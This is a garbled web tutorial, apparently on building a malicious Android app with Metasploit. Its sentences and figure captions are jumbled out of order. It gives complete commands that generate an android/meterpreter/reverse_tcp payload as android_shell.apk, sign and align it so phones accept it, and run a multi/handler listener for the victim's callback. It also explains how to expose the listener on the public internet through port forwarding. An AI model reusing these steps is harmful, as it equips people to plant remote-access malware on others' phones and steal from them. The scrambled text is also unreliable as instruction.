Now launch the exploit multi/handler and use the Android payload to listen to the clients. Step 2: is to set up the listener on the Kali Linux machine with multi/handler payload using Metasploit.įigure 10: Display Metasploit start screen Our new filename is singed_jar.apk after the verification with Zipalign.įigure 8: Malicious. Now we have signed our android_shell.apk file successfully and it can be run on any Android environment. Terminal: zipalign -v 4 android_shell.apk singed_jar.apkįigure 7: Verifying the.
Zipalign is not preinstalled in Kali Linux, so you will have to install it first. Terminal: jarsigner -verify -verbose -certs android_shell.apkįigure 5: Verifying the. Terminal: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hackedįigure 4: Signing a. Terminal: keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
apk file, we need to sign a certificate because Android mobile devices are not allowed to install apps without the appropriately signed certificate. To perform in the public network, you should enter your public address in LHOST and enable port forwarding on the router.Īfter this command, now you can locate your file on the desktop with the name android_shell.apk.Īfter we successfully created the. Note: In this command, we have used the local address because we are demonstrating in the local environment. LPORT - Localhost port on which the connection listen for the victim (we set it to 4444).LHOST - Localhost IP to receive a back connection (Check yours with ifconfig command).Terminal: msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP LPORT=LocalPort R > android_shell.apkįigure 1: MSFvenom payload MSFvenom is used to make a payload to penetrate the Android emulator.īy using MSFvenom, we create a payload. It standardizes the command-line options, speeds things up a bit by using a single framework instance and handles all possible output formats.
Merging these two tools into a single tool just makes sense. These tools are extremely useful for generating payloads in various formats and encoding these payloads using various encoder modules. It is a combination of MSFpayload and MSFencode.